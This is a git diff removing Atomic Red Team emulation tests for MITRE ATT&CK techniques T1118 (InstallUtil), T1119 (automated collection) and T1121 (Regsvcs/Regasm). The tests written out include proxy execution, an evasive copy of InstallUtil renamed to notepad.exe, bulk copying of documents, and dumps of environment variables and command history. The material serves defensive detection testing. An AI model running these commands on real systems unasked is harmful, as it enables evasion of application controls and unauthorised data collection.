-    InvocationMethod = '#{invocation_method}'
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-CheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - InstallHelper method call
-Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
-executed successfuly.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | InstallHelper|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/logfile= /logtoconsole=false `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallHelper method execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - InstallUtil class constructor method call
-Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | Executable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/logfile= /logtoconsole=false `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - InstallUtil Install method call
-Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | Executable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/logfile= /logtoconsole=false /installtype=notransaction /action=install `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_Install_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - InstallUtil Uninstall method call - /U variant
-Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | Executable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/logfile= /logtoconsole=false /U `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_Uninstall_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant
-Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | Executable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_Uninstall_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - InstallUtil HelpText method call
-Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | Executable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "/? `"$InstallerAssemblyFullPath`""
-$ExpectedOutput = 'Constructor_HelpText_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = '#{invocation_method}'
-    CommandLine = $CommandLine
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-InstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - InstallUtil evasive invocation
-Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
-will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "$Env:windir\System32\Tasks"
-$InstallerAssemblyFileName = 'readme.txt'
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$CommandLine = "readme.txt"
-$ExpectedOutput = 'Constructor_'
-
-# Explicitly set the directory so that a relative path to readme.txt can be supplied.
-Set-Location "$Env:windir\System32\Tasks"
-
-Copy-Item -Path "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe" -Destination "$Env:windir\System32\Tasks\notepad.exe"
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
-    InvocationMethod = 'Executable'
-    CommandLine = $CommandLine
-    InstallUtilPath = "$Env:windir\System32\Tasks\notepad.exe"
-}
-
-$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
-
-if ($ActualOutput -ne $ExpectedOutput) {
-    throw @"
-Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.
-Expected: $ExpectedOutput
-Actual: $ActualOutput
-"@
-}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Path "$Env:windir\System32\Tasks\readme.txt" -ErrorAction Ignore
-Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallLog" -ErrorAction Ignore
-Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState" -ErrorAction Ignore
-Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1119.md b/Atomic_Threat_Coverage/Triggers/T1119.md
deleted file mode 100644
index 0f7ddc1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1119.md
+++ /dev/null
@@ -1,146 +0,0 @@
-# T1119 - Automated Collection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1119)
-<blockquote>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
-
-This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Remote File Copy](https://attack.mitre.org/techniques/T1105) to identify and move files.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Automated Collection Command Prompt](#atomic-test-1---automated-collection-command-prompt)
-
-- [Atomic Test #2 - Automated Collection PowerShell](#atomic-test-2---automated-collection-powershell)
-
-- [Atomic Test #3 - Recon information for export with PowerShell](#atomic-test-3---recon-information-for-export-with-powershell)
-
-- [Atomic Test #4 - Recon information for export with Command Prompt](#atomic-test-4---recon-information-for-export-with-command-prompt)
-
-
-<br/>
-
-## Atomic Test #1 - Automated Collection Command Prompt
-Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
-to see what was collected.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
-dir c: /b /s .docx | findstr /e .docx
-for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
-```
-
-#### Cleanup Commands:
-```cmd
-del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Automated Collection PowerShell
-Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
-to see what was collected.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
-Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Recon information for export with PowerShell
-collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
-to see what was collected.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-Service > $env:TEMP\T1119_1.txt
-Get-ChildItem Env: > $env:TEMP\T1119_2.txt
-Get-Process > $env:TEMP\T1119_3.txt
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
-Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
-Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Recon information for export with Command Prompt
-collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
-to see what was collected.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-sc query type=service > %TEMP%\T1119_1.txt
-doskey /history > %TEMP%\T1119_2.txt
-wmic process list > %TEMP%\T1119_3.txt
-tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
-```
-
-#### Cleanup Commands:
-```cmd
-del %TEMP%\T1119_1.txt >nul 2>&1
-del %TEMP%\T1119_2.txt >nul 2>&1
-del %TEMP%\T1119_3.txt >nul 2>&1
-del %TEMP%\T1119_4.txt >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1121.md b/Atomic_Threat_Coverage/Triggers/T1121.md
deleted file mode 100644
index 6a39a73..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1121.md
+++ /dev/null
@@ -1,116 +0,0 @@
-# T1121 - Regsvcs/Regasm
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1121)
-<blockquote>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
-
-Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Regasm Uninstall Method Call Test](#atomic-test-1---regasm-uninstall-method-call-test)
-
-- [Atomic Test #2 - Regsvs Uninstall Method Call Test](#atomic-test-2---regsvs-uninstall-method-call-test)
-
-
-<br/>
-
-## Atomic Test #1 - Regasm Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Location of the payload | Path | %tmp%&#92;T1121.dll|
-| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder&#92;T1121&#92;src&#92;T1121.cs|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{output_file} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Regsvs Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
-along with other information about the assembly being installed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Location of the payload | Path | $Env:TEMP&#92;T1121.dll|
-| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder&#92;T1121&#92;src&#92;T1121.cs|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
-$Content = [System.Convert]::FromBase64String($key)
-Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{output_file} -ErrorAction Ignore | Out-Null
-$parentpath = Split-Path -Path "#{output_file}"
-Remove-Item $parentpath\key.snk -ErrorAction Ignore | Out-Null
-Remove-Item $parentpath\T1121.tlb -ErrorAction Ignore | Out-Null
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
-```
-
-
-
-
-<br/>
